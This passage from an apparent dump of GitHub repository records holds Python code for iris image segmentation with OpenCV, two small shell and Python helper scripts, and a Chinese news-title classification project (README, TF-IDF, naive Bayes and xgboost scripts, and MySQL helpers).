= cv.CloneImage(self.source_image)\n cv.Zero(image02)\n image04 = cv.CreateImage(cv.GetSize(self.source_image), cv.IPL_DEPTH_8U, 3)\n cv.Zero(image04)\n\n # Threshold the source image. This needful for cv.FindContours().\n cv.Threshold(self.source_image, image02, slider_pos, 255, cv.CV_THRESH_BINARY)\n\n # Find all contours.\n cont = cv.FindContours(image02,\n stor,\n cv.CV_RETR_LIST,\n cv.CV_CHAIN_APPROX_NONE,\n (0, 0))\n \n maxf = 0\n maxs = 0\n size1 = 0\n \n for c in contour_iterator(cont):\n if len(c) > ellipse_size:\n PointArray2D32f = cv.CreateMat(1, len(c), cv.CV_32FC2)\n for (i, (x, y)) in enumerate(c):\n PointArray2D32f[0, i] = (x, y)\n \n \n # Draw the current contour in gray\n gray = cv.CV_RGB(100, 100, 100)\n cv.DrawContours(image04, c, gray, gray,0,1,8,(0,0))\n \n if iter == 0:\n strng = segF + '/' + 'contour1.png'\n cv.SaveImage(strng,image04)\n color = (255,255,255)\n \n (center, size, angle) = cv.FitEllipse2(PointArray2D32f)\n \n # Convert ellipse data from float to integer representation.\n center = (cv.Round(center[0]), cv.Round(center[1]))\n size = (cv.Round(size[0] * 0.5), cv.Round(size[1] * 0.5))\n \n if iter == 1:\n if size[0] > size[1]:\n size2 = size[0]\n else:\n size2 = size[1]\n \n if size2 > size1:\n size1 = size2\n size3 = size \n\n # Fits ellipse to current contour.\n if eoc == 0 and iter == 2:\n rand_val = abs((lastr - ((size[0]+size[1])/2)))\n if rand_val > 20 and float(max(size[0],size[1]))/float(min(size[0],size[1])) < 1.5:\n lastcx = center[0]\n lastcy = center[1]\n lastr = (size[0]+size[1])/2\n \n if rand_val > 20 and float(max(size[0],size[1]))/float(min(size[0],size[1])) < 1.4:\n cv.Ellipse(cimg, center, size,\n angle, 0, 360,\n color,2, cv.CV_AA, 0)\n cv.Ellipse(source_image1, center, size,\n angle, 0, 360,\n color,2, cv.CV_AA, 0) \n \n elif eoc == 1 and iter == 2:\n (int,cntr,rad) = cv.MinEnclosingCircle(PointArray2D32f)\n cntr = (cv.Round(cntr[0]), cv.Round(cntr[1]))\n rad = (cv.Round(rad))\n if maxf == 0 and maxs == 0:\n cv.Circle(cimg, cntr, rad, color, 1, cv.CV_AA, shift=0)\n cv.Circle(source_image1, cntr, rad, color, 2, cv.CV_AA, shift=0)\n maxf = rad\n elif (maxf > 0 and maxs == 0) and abs(rad - maxf) > 30:\n cv.Circle(cimg, cntr, rad, color, 2, cv.CV_AA, shift=0)\n cv.Circle(source_image1, cntr, rad, color, 2, cv.CV_AA, shift=0)\n maxs = len(c) \n if iter == 1:\n temp3 = 2*abs(size3[1] - size3[0])\n if (temp3 > 40):\n eoc = 1\n\n\ndef rgb2gray(img):\n \"\"\"Convert a RGB image to gray scale.\"\"\"\n return 0.2989*img[:,:,0] + 0.587*img[:,:,1] + 0.114*img[:,:,2]\n\ndef circle_levelset(shape, center, sqradius, scalerow=1.0):\n \"\"\"Build a binary function with a circle as the 0.5-levelset.\"\"\"\n grid = np.mgrid[map(slice, shape)].T - center\n phi = sqradius - np.sqrt(np.sum((grid.T)**2, 0))\n u = np.float_(phi > 0)\n return u\n\ndef test_iris():\n global lvl_up,lvl_down,lvl_left,lvl_right\n # Load the image.\n img_lvl = imread(filename)/255.0\n \n # g(I)\n gI = morphsnakes.gborders(img_lvl, alpha=2200, sigma=5.48)\n \n # Morphological GAC. Initialization of the level-set.\n mgac = morphsnakes.MorphGAC(gI, smoothing=1, threshold=0.31, balloon=1)\n mgac.levelset = circle_levelset(img_lvl.shape, (cy, cx), (int(max_t/2) + 30))\n \n # Visual evolution.\n ppl.figure()\n ij = morphsnakes.evolve_visual(mgac, num_iters=120, background=img_lvl)\n #print ij.shape\n \n x_list = []\n y_list = []\n \n for i in range(w-1):\n for j in range(h-1):\n if ij[j][i] == 0:\n eyeball_bw[j][i] = (255,0,0)\n else:\n x_list.append(i)\n y_list.append(j)\n eyeball_bw[j][i] = (0,0,255)\n \n lvl_down = max(y_list)\n lvl_up = min(y_list)\n lvl_right = max(x_list)\n lvl_left = min(x_list)\n\ntest_iris()\n\ndef test_pupil():\n global p_up,p_down,p_left,p_right\n # Load the image.\n img_lvl = imread(filename)/255.0\n \n # g(I)\n gI = morphsnakes.gborders(img_lvl, alpha=2200, sigma=5.48)\n \n # Morphological GAC. Initialization of the level-set.\n mgac = morphsnakes.MorphGAC(gI, smoothing=1, threshold=0.31, balloon=1)\n mgac.levelset = circle_levelset(img_lvl.shape, (cy, cx), (max_t*0.3))\n \n # Visual evolution.\n ppl.figure()\n ij = morphsnakes.evolve_visual(mgac, num_iters=50, background=img_lvl)\n \n x_list = []\n y_list = []\n \n for i in range(w-1):\n for j in range(h-1):\n if ij[j][i] == 0:\n iris_bw[j][i] = (255,0,0)\n else:\n x_list.append(i)\n y_list.append(j)\n iris_bw[j][i] = (0,0,255)\n \n p_down = max(y_list)\n p_up = min(y_list)\n p_right = max(x_list)\n p_left = min(x_list)\n\ntest_pupil()\n \nif (p_left - lvl_left) > 1.3*(lvl_right - p_right):\n print 'Left WRONG'\n lvl_left = lvl_left + int((p_left - lvl_left)-(lvl_right - p_right))\nelif (lvl_right - p_right) > 1.3*(p_left - lvl_left):\n print 'Right WRONG'\n lvl_right = lvl_right - int((lvl_right - p_right)-(p_left - lvl_left)) \n\nif (p_right - p_left) > (p_down - p_up):\n ellipse_size = (p_right - p_left)\nelse:\n ellipse_size = (p_down - p_up)\n \nellipse_size = 2*ellipse_size\n\n# STage 3 - GrabCut\n\nmask = np.zeros(img.shape[:2],dtype = np.uint8) # mask initialized to PR_BG\noutput = np.zeros(img.shape,np.uint8) # output image to be shown\n\n# input and output windows\ncv2.namedWindow('output')\ncv2.namedWindow('input')\ncv2.moveWindow('input',img.shape[1]+10,90)\n\nrect_over = True\ncv2.rectangle(img,(lvl_left,lvl_down),(lvl_right,lvl_up),BLUE,2)\nrect = (min(lvl_left,lvl_right),min(lvl_up,lvl_down),abs(lvl_left-lvl_right),abs(lvl_up-lvl_down))\nrect_or_mask = 0\nbgdmodel = np.zeros((1,65),np.float64)\nfgdmodel = np.zeros((1,65),np.float64)\ncv2.grabCut(img2,mask,rect,bgdmodel,fgdmodel,1,cv2.GC_INIT_WITH_RECT)\nrect_or_mask = 1\n\ndiff = p_up - lvl_up\n\nm = p_left - 2\nn = p_up - 2\nwhile n > (p_up - 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m -= 1\n n -= 1\n\nm = p_right + 2\nn = p_up + 2\nwhile n > (p_up - 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m += 1\n n -= 1\n\n\ndiff = lvl_down - p_down\nm = p_left - 2\nn = p_down + 2\nwhile n < (p_down + 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m -= 1\n n += 1\n\nm = p_right + 2\nn = p_down + 2\nwhile n < (p_down + 1.8*(diff/5)):\n cv2.circle(img,(m,n),thickness,value['color'],-1)\n cv2.circle(mask,(m,n),thickness,value['val'],-1)\n m += 1\n n += 1\n \ndiff = (p_left - lvl_left)/10\nm = p_left - diff\nwhile m > (lvl_left + diff):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m -= 1\n \ndiff = (lvl_right - p_right)/10\nm = p_right + diff\nwhile m < (lvl_right - diff):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m += 1\n\n\ndiff = p_right - p_left\nm = p_left + (diff/5)\nvalue = DRAW_BG\nwhile m < (p_left + 4*(diff/5)):\n cv2.circle(img,(m,cy),thickness,value['color'],-1)\n cv2.circle(mask,(m,cy),thickness,value['val'],-1)\n m += 1\n\ntempi = 0\n\nwhile tempi < 10:\n bgdmodel = np.zeros((1,65),np.float64)\n fgdmodel = np.zeros((1,65),np.float64)\n cv2.grabCut(img2,mask,rect,bgdmodel,fgdmodel,1,cv2.GC_INIT_WITH_MASK)\n tempi += 1\n \nmask2 = np.where((mask==1) + (mask==3),255,0).astype('uint8')\noutput = cv2.bitwise_and(img2,img2,mask=mask2)\n\nstrng = os.path.join(segF, os.path.basename(filename).split('.')[0] + '_seg.png')\ncv2.imwrite(strng,output)\n\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\n\ncv.NamedWindow(\"Result\", 1)\n\n# Stage 4 - Ellipse fitting\n\nfe = FitEllipse(source_image, (min_val+20))\n\ntab1 = cv2.imread(strng)\niter = 1\nflag_t = 0\n\nif (p_up - lvl_up) < (0.75*(lvl_down - p_down)):\n flag_t = 1\nelif (lvl_down - p_down) < (0.75*(p_up - lvl_up)):\n flag_t = 2\n \nif flag_t == 1:\n bnd = p_up - 10\n for i in range(w-1):\n for j in range(h-1):\n if j <= bnd and tab1[j][i][0] == 100:\n tab1[j][i] = (0,0,0)\n #if j <= bnd and tab2[j][i][0] == 255:\n #tab2[j][i] = (0,0,0)\nelif flag_t == 2:\n bnd = p_down + 10\n for i in range(w-1):\n for j in range(h-1):\n if j >= bnd and tab1[j][i][0] == 100:\n tab1[j][i] = (0,0,0)\n\ncv2.imwrite(strng,tab1)\n\nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nfe = FitEllipse(source_image, (min_val+20))\n\niter = 2\nsource_image = cv.LoadImage(strng, cv.CV_LOAD_IMAGE_GRAYSCALE)\nsource_image1 = cv.LoadImage(filename, cv.CV_LOAD_IMAGE_GRAYSCALE) \nfe = FitEllipse(source_image, (min_val+20))\n\n# Saving results\n\nstrng1 = os.path.join(segF, os.path.basename(filename).split('.')[0] + '_contour.png')\ncv.SaveImage(strng1,source_image1)\ncimg1 = cv2.imread(strng1)\nbar = np.zeros((img.shape[0],5,3),np.uint8)\nres = np.hstack((img2,bar,eyeball_bw,bar,iris_bw,bar,img,bar,output,bar,cimg1))\noutput_file = os.path.join(segF, os.path.basename(filename).split('.')[0] + '_grabcut_output.png')\ncv2.imwrite(output_file,res)\n\nprint 'Done segmenting!!!'\ncv2.destroyAllWindows()" } ]
1
panos-kosmidis/Bash_Profiles
https://github.com/panos-kosmidis/Bash_Profiles
f6647642c496090f665eba9a2d239389f68b4745
61113a773c30053b67ad9a220d3ed2c02de39b9b
c27cd548347e3b9430486a304767e173c16200a8
refs/heads/master
2020-03-04T20:55:08.913508
2013-01-07T16:29:45
2013-01-07T16:31:04
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4958506226539612, "alphanum_fraction": 0.5, "avg_line_length": 24.3157901763916, "blob_id": "37e3e368b26f59b54f87fe1d658ba359097e0e00", "content_id": "24025e3b5a618026e98d57c386173e0e6560098c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/bin/pyhelp", "repo_name": "panos-kosmidis/Bash_Profiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\n\nwords = sys.argv; words.pop(0)\n\nfor word in words:\n try:\n help(word) # simplest case\n except NameError: # not a builtin or global\n try:\n try:\n __import__(word)\n except ImportError: # not a module...\n module, _ = word.rsplit('.', 1)\n __import__(module)\n\n help(word)\n except ImportError:\n print('Cannot find \"%s\" to import!' % word)\n\n" }, { "alpha_fraction": 0.6111111044883728, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 11, "blob_id": "d29d059a7a0bc28f3a754d88cf52384e19ca54ca", "content_id": "082a82d91767061221cba535ed9c3811bffd9c6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 36, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/bin/composer", "repo_name": "panos-kosmidis/Bash_Profiles", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n~/bin/composer.phar $@\n" } ]
2
ranmengyuan/TitleCategorization
https://github.com/ranmengyuan/TitleCategorization
b759a4ebad53d4b2a94ac80242750edcd359c54a
f4b38ae131b1696af82ea569a760fdd0380ea0e7
2d64be648b4664beaa5eb40f47d8b7635006ff70
refs/heads/master
2021-09-08T02:31:15.610362
2018-03-06T03:05:42
2018-03-06T03:05:42
123,883,054
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.850931704044342, "alphanum_fraction": 0.8612836599349976, "avg_line_length": 18.714284896850586, "blob_id": "d1c2365a308ff388d469c18f971a6f6bfea45d40", "content_id": "e295138dd0ece9e153c09b4f0c3802641f1dff80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1918, "license_type": "no_license", "max_line_length": 170, "num_lines": 49, "path": "/README.md", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "# TitleCategorization\n\nTitleCategorization是一款对新闻标题进行分类的工具。给定新闻标题x =(x1,x2,...,xn),其中xj表示x中的第j个字,对象是找出其可能的类别或标签c∈C。更具体地说,我们需要找出一个函数来预测x属于哪个类别。主要是通过TF-IDF对标题的关键词进行提取,然后通过朴素贝叶斯、SVM、Xgboost对文本进行分类。\n\n# 入门\n\nTitleCategorization包括analyze、bean、dataBase、file和main。\n\nfile主要是文件操作,对给定的已知数据进行读取,建立训练集。\n\nbean和dataBase主要是对数据库进行操作。\n\nanalyze主要是通过算法对数据进行预测。\n\nmain主要是对整个程序进行控制。\n\n# 文件结构\n\nbean和dataBase主要是对数据库进行操作。\n\nanalyze主要是通过算法对数据进行预测。\n\ncontrol.py主要是对整个程序进行控制。\n\nresult.text是正确的结果。\n\nresult1.text是用朴素贝叶斯分类算法后得到的结果。\n\nresult2.text是用SVM算法后得到的结果。\n\nresult3.text是用Xgboost算法后得到的结果。\n\nstatic.text是用朴素贝叶斯分类算法后得到的结果与正确结果各类标题数量的对比。\n\nstatic1.text是用Svm算法后得到的结果与正确结果各类标题数量的对比。\n\nstatic2.text是用Xgboost算法后得到的结果与正确结果各类标题数量的对比。\n\nresultdata是三个分类算法进行投票机制融合后的最终预测结果。\n\n# 支持平台\n\nTitleCategorization基于Python3.5。如果想要运行TitleCategorization推荐下载Python3.x解析器,并且需要pymysql,sklearn等包的支持。同时,需要注意处理文件和网页的格式。\n\n# 疑问\n\n如果您发现了诸如崩溃、意外行为或类似的问题,请访问[issue tracker](https://github.com/ranmengyuan/TitleCategorization/issues)方便交流。\n\n谢谢!\n" }, { "alpha_fraction": 0.5334288477897644, "alphanum_fraction": 0.5427889227867126, "avg_line_length": 28.410112380981445, "blob_id": "d7fed02f0b8a4bae6cbc2a1e60869e76f08539f8", "content_id": "f7b114d455447574bf992726157611bd97043a58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10752, "license_type": "no_license", "max_line_length": 117, "num_lines": 356, "path": "/control.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "# coding=utf-8\nimport jieba.posseg as pseg\nfrom dataBase.toDatabase import Headline, read_by_line, data_todatabase, create_data, get_element, create_result, \\\n result_todatabase, conn_db\nfrom Analyze.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.naive_bayes import MultinomialNB\nfrom tgrocery import Grocery\nimport xgboost as xgb\n# from sklearn.cross_validation import train_test_split\n\nimport numpy as np\n\nwordtype = []\nwordtype.append('n')\nwordtype.append('i')\nwordtype.append('l')\nwordtype.append('Ng')\nwordtype.append('nr')\nwordtype.append('ns')\nwordtype.append('nt')\nwordtype.append('nz')\nwordtype.append('v')\nwordtype.append('vg')\nwordtype.append('vd')\nwordtype.append('vn')\nwordtype.append('a')\nwordtype.append('ag')\nwordtype.append('ad')\nwordtype.append('an')\n\ntarget = []\ntarget.append(\"history\")\ntarget.append(\"military\")\ntarget.append(\"baby\")\ntarget.append(\"world\")\ntarget.append(\"tech\")\ntarget.append(\"game\")\ntarget.append(\"society\")\ntarget.append(\"sports\")\ntarget.append(\"travel\")\ntarget.append(\"car\")\ntarget.append(\"food\")\ntarget.append(\"entertainment\")\ntarget.append(\"finance\")\ntarget.append(\"fashion\")\ntarget.append(\"discovery\")\ntarget.append(\"story\")\ntarget.append(\"regimen\")\ntarget.append(\"essay\")\n\n\ndef get_stop():\n \"\"\"\n 获取停用词典\n :return:\n \"\"\"\n stopwords = {}\n fstop = open('//Volumes//Transcend//文件//实验室//标题分类//chinese_stopword.txt', 'r')\n for eachWord in fstop:\n stopwords[eachWord.strip()] = eachWord.strip()\n fstop.close()\n return stopwords\n\n\n#\n\ndef chang_result(word):\n \"\"\"\n 获得结果的序号\n :return:\n \"\"\"\n for i in range(len(target)):\n if word == target[i]:\n return i\n return -1\n\n\n# def get_data():\n# \"\"\"\n# 获取数据,整理后存入数据库\n# :return:\n# \"\"\"\n# stop = get_stop()\n# stopwords = {}.fromkeys(stop)\n# x_train = []\n# y_train = []\n# x_test = []\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//train.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = temp_data[1].split(\" \")\n# j = 0\n# x = []\n# y = []\n# index = chang_result(temp_data[0])\n# y_train.append(index)\n# while 1:\n# if j >= len(temp):\n# break\n# if temp[j] not in stopwords:\n# x.append(temp[j])\n# j += 1\n# x_train.append(x)\n#\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//test//test.word\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp = content[0].split(\" \")\n# j = 0\n# x = []\n# while 1:\n# if j >= len(temp):\n# break\n# if temp[j] not in stopwords:\n# x.append(temp[j])\n# j += 1\n# x_test.append(x)\n# return x_train, y_train, x_test\n\n\ndef get_data():\n \"\"\"\n 获取数据,整理后存入数据库\n :return:\n \"\"\"\n stop = get_stop()\n stopwords = {}.fromkeys(stop)\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n test = []\n file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//train.txt\")\n # conn, cur = create_data(\"Train\")\n for i in range(len(file_content)):\n content = file_content[i].split(\"\\n\")\n temp_data = content[0].split(\"\\t\")\n temp = temp_data[1].split(\" \")\n j = 0\n x = []\n y = []\n index = chang_result(temp_data[0])\n y_train.append(index)\n while 1:\n if j >= len(temp):\n break\n if temp[j] not in stopwords:\n # data = Headline()\n # data.result = temp_data[0]\n # data.content = temp[j]\n # data.sentence_id = i + 1\n # data_todatabase(conn, cur, data, \"Train\")\n x.append(temp[j])\n j += 1\n x_train.append(x)\n # y_train.append(y)\n\n # conn, cur = create_data(\"Test\")\n file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//word//dev.txt\")\n for i in range(len(file_content)):\n content = file_content[i].split(\"\\n\")\n temp_data = content[0].split(\"\\t\")\n temp = temp_data[1].split(\" \")\n j = 0\n x = []\n y = []\n index = chang_result(temp_data[0])\n y_test.append(index)\n t = ''\n while 1:\n if j >= len(temp):\n break\n t += temp[j]\n if temp[j] not in stopwords:\n # data = Headline()\n # data.result = temp_data[0]\n # data.content = temp[j]\n # data.sentence_id = i + 1\n # data_todatabase(conn, cur, data, \"Test\")\n x.append(temp[j])\n j += 1\n x_test.append(x)\n test.append(t)\n # y_test.append(y)\n return x_train, y_train, x_test, y_test, test\n\n\n# def get_data():\n# \"\"\"\n# 获取数据,并整理\n# :return:\n# \"\"\"\n# stopwords = get_stop()\n# x_train = []\n# y_train = []\n# x_test = []\n# y_test = []\n# test = []\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//sentence//train.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = pseg.cut(temp_data[1])\n# x = []\n# y_train.append(temp_data[0])\n# for w in temp:\n# if (w.word not in stopwords) & (w.flag in wordtype):\n# x.append(w.word)\n# x_train.append(x)\n#\n# file_content = read_by_line(\"//Volumes//Transcend//文件//实验室//标题分类//nlpcc_data//sentence//test.txt\")\n# for i in range(len(file_content)):\n# content = file_content[i].split(\"\\n\")\n# temp_data = content[0].split(\"\\t\")\n# temp = pseg.cut(temp_data[1])\n# x = []\n# y_test.append(temp_data[0])\n# for w in temp:\n# if (w.word not in stopwords) & (w.flag in wordtype):\n# x.append(w.word)\n# x_test.append(x)\n# test.append(temp_data[1])\n# return x_train, y_train, x_test, y_test, test\n\n\ndef analyze_data():\n \"\"\"\n 分析数据,获得每个元素的概率\n :return:\n \"\"\"\n # conn, cur = create_result(\"Rate\")\n conn = conn_db()\n cur = conn.cursor()\n i = 89\n while 1:\n element = get_element(cur, i)\n if len(element) == 0:\n break\n for j in range(len(element)):\n print(element[j])\n sum, count = MultinomialNB(element[j], target)\n if sum == 0:\n for n in range(18):\n rate.append(0)\n else:\n rate = []\n for k in range(len(count)):\n temp = count[k] / sum\n rate.append(temp)\n result_todatabase(conn, cur, element[j], i, rate, \"Rate\")\n\n i += 1\n\n\nif __name__ == \"__main__\":\n target = []\n target.append(\"history\")\n target.append(\"military\")\n target.append(\"baby\")\n target.append(\"world\")\n target.append(\"tech\")\n target.append(\"game\")\n target.append(\"society\")\n target.append(\"sports\")\n target.append(\"travel\")\n target.append(\"car\")\n target.append(\"food\")\n target.append(\"entertainment\")\n target.append(\"finance\")\n target.append(\"fashion\")\n target.append(\"discovery\")\n target.append(\"story\")\n target.append(\"regimen\")\n target.append(\"essay\")\n\n # get_data()\n # analyze_data()\n\n x_train, y_train, x_test, y_test, test = get_data()\n print(len(x_train))\n # x_train, x_valid, y_train, y_valid = train_test_split(x_train, y_train, test_size=0.9, random_state=4242)\n # print(len(x_train))\n\n count_vec = TfidfVectorizer(binary=False, decode_error='ignore', stop_words='english', tokenizer=lambda doc: doc,\n lowercase=False)\n x_train = count_vec.fit_transform(x_train)\n train = x_train.toarray()\n x_test = count_vec.transform(x_test)\n test = x_test.toarray()\n\n # clf = MultinomialNB(alpha=0.1).fit(x_train, y_train)\n # doc_class_predicted = clf.predict(x_test)\n # f = open('resultdata.text', 'a')\n # for i in range(len(doc_class_predicted)):\n # index = int(doc_class_predicted[i])\n # f.write(target[index] + \"\\n\")\n\n # dtrain = xgb.DMatrix(train, label=y_train)\n # dtest = xgb.DMatrix(test)\n # # param = {'max_depth': 6, 'eta': 0.5, 'eval_metric': 'merror', 'silent': 1, 'objective': 'multi:softmax',\n # # 'num_class': 3} # 参数\n # # param = {'learning_rate': 0.1, 'n_estimators': 1000, 'max_depth': 3, 'nthread': 4, 'min_child_weight': 5,\n # # 'gamma': 0, 'subsample': 1.0, 'colsample_bytree': 0.8, 'scale_pos_weight': 1, 'eta': 0.05,\n # # 'silent': 1, 'objective': 'binary:logistic'}\n # param = {'learning_rate': 0.1, 'max_depth': 3, 'eta': 0.05, 'eval_metric': 'merror',\n # 'silent': 1, 'objective': 'multi:softmax', 'num_class': 18} # 参数\n #\n # evallist = [(dtrain, 'train')] # 这步可以不要,用于测试效果\n # num_round = 50 # 循环次数\n # plst = param.items()\n # bst = xgb.train(plst, dtrain, num_round, evallist)\n # preds = bst.predict(dtest)\n # print(np.mean(preds == y_test))\n # for value in preds:\n # print(value)\n\n\n grocery = tgrocery.Grocery('sample')\n grocery.train(train, label=y_train)\n grocery.save()\n grocery.load()\n preds = grocery.predict(x_test)\n print(preds)\n\n\n\n# i = 0\n# f = open('result3.text', 'a')\n# result = []\n# for pre in doc_class_predicted:\n# result.append(pre)\n# f.write(test[i] + \"\\t\" + pre + \"\\n\")\n# i += 1\n# for i in range(len(target)):\n# n = result.count(target[i])\n# n1 = y_test.count(target[i])\n# print(target[i] + \"\\t\" + str(n) + \"\\t\" + str(n1))\n\n\n# precision, recall, thresholds = precision_recall_curve(y_test, doc_class_predicted)\n# answer = clf.predict_proba(x_test)[:, 1]\n# report = answer > 0.5\n# print(classification_report(y_test, report, target_names=['neg', 'pos']))\n\n# x = np.load(\"a.npy\")\n# y = np.load(\"b.npy\")\n# y_train = y.ravel()\n# y = np.array(y_train).astype(int)\n# clf = MultinomialNB(alpha=0.1)\n# clf.fit(x, y)\n# pred = clf.predict([x[0]])\n# print(pred)\n" }, { "alpha_fraction": 0.6112852692604065, "alphanum_fraction": 0.6112852692604065, "avg_line_length": 20.266666412353516, "blob_id": "ae6274fe9a6442b94bcfe5f190667ebfcd131733", "content_id": "44761096a04bd095b882527a5a01cf5d9daa6d27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/Analyze/naive_bayes.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "from dataBase.toDatabase import conn_db, get_count, get_sum\n\n\ndef MultinomialNB(data, target):\n \"\"\"\n 每个样本确定每个标签集的正确预测。\n :param data:\n :param target:\n :return:\n \"\"\"\n conn = conn_db()\n cur = conn.cursor()\n sum = get_sum(cur, data)\n count = get_count(cur, data, target)\n return sum, count\n" }, { "alpha_fraction": 0.4681059718132019, "alphanum_fraction": 0.4779195189476013, "avg_line_length": 27.62359619140625, "blob_id": "ef00f8c800582548fd396635eb04a9c7199481a8", "content_id": "37a399aa674ab84408430a544340872de6978007", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5283, "license_type": "no_license", "max_line_length": 131, "num_lines": 178, "path": "/dataBase/toDatabase.py", "repo_name": "ranmengyuan/TitleCategorization", "src_encoding": "UTF-8", "text": "from dataBase.sql_helper import conn_db, conn_close, exe_query, exe_table, exe_update\n\n\nclass Headline:\n content = ''\n sentence_id = 0\n result = ''\n\n def __init__(self):\n self.content = ''\n self.sentence_id = 0\n self.result = ''\n\n\ndef read_by_line(address):\n \"\"\"\n 带缓存的文件读取一行数据\n :param address:\n :return:\n \"\"\"\n file = open(address)\n file_content = []\n while 1:\n lines = file.readlines(10000)\n if not lines:\n break\n for line in lines:\n file_content.append(line)\n return file_content\n\n\ndef create_data(form):\n \"\"\"\n 建立数据库表格\n :param form:\n :return:\n \"\"\"\n try:\n conn = conn_db()\n cur = conn.cursor()\n sql = \"DROP TABLE if EXISTS \" + form\n exe_table(cur, sql)\n sql = \"CREATE TABLE \" + form + \"(id INT NOT NULL AUTO_INCREMENT,content VARCHAR (255),sentence_id INT ,\" \\\n \"result VARCHAR(255) ,PRIMARY KEY (id)) ENGINE = InnoDB DEFAULT CHARSET = UTF8\"\n exe_table(cur, sql)\n\n except Exception as e:\n print(e)\n finally:\n return conn, cur\n\n\ndef data_todatabase(conn, cur, data, form):\n \"\"\"\n 将文本文件处理并存入数据库中\n :param file_content:\n :return:\n \"\"\"\n try:\n sql = \"INSERT INTO \" + form + \"(content,sentence_id,result) VALUES ('\" + data.content + \"','\" + str(\n data.sentence_id) + \"','\" + data.result + \"')\"\n print(form + \"\\t\" + data.content)\n exe_table(cur, sql)\n except Exception as e:\n print(e)\n\n\ndef create_result(form):\n \"\"\"\n 建立数据库表格\n :param form:\n :return:\n \"\"\"\n try:\n conn = conn_db()\n cur = conn.cursor()\n sql = \"DROP TABLE if EXISTS \" + form\n exe_table(cur, sql)\n sql = \"CREATE TABLE \" + form + \"(id INT NOT NULL AUTO_INCREMENT,content VARCHAR (255),sentence_id INT ,\" \\\n \"history float ,military float ,baby float ,world float ,tech float ,game float \" \\\n \",society float ,sports float ,travel float ,car float ,food float ,entertainment float \" \\\n \",finance float ,fashion float ,discovery float ,story float ,regimen float ,essay float \" \\\n \",PRIMARY KEY (id)) ENGINE = InnoDB DEFAULT CHARSET = UTF8\"\n exe_table(cur, sql)\n\n except Exception as e:\n print(e)\n finally:\n return conn, cur\n\n\ndef result_todatabase(conn, cur, content, sentence, rate, form):\n \"\"\"\n 将文本文件处理并存入数据库中\n :param file_content:\n :return:\n \"\"\"\n try:\n sql = \"INSERT INTO \" + form + \"(content,sentence_id,history ,military ,baby ,world ,tech ,game \" \\\n \",society ,sports ,travel ,car ,food ,entertainment \" \\\n \",finance ,fashion ,discovery ,story ,regimen ,essay) VALUES ('\" + content + \\\n \"','\" + str(sentence) + \"','\" + str(rate[0]) + \"','\" + str(rate[1]) + \"','\" + str(rate[2]) + \"','\" + str(\n rate[3]) + \"','\" \\\n + str(rate[4]) + \"','\" + str(rate[5]) + \"','\" + str(rate[6]) + \"','\" + str(rate[7]) + \"','\" + str(\n rate[8]) + \"','\" + str(rate[9]) + \\\n \"','\" + str(rate[10]) + \"','\" + str(rate[11]) + \"','\" + str(rate[12]) + \"','\" + str(\n rate[13]) + \"','\" + str(rate[14]) + \"',\" \\\n \"'\" + str(rate[\n 15]) + \"','\" + str(rate[16]) + \"','\" + str(\n rate[17]) + \"')\"\n exe_update(conn, cur, sql)\n\n except Exception as e:\n print(e)\n\n\ndef get_sum(cur, data):\n \"\"\"\n 获得某个元素出现的总次数\n :param cur:\n :param data:\n :return:\n \"\"\"\n temp = -1\n try:\n sql = \"SELECT COUNT(content)FROM Train WHERE content='\" + data + \"'\"\n sum = exe_query(cur, sql)\n temp = \"\"\n for num in sum:\n temp = int(num[0])\n except Exception as e:\n print(e)\n temp = 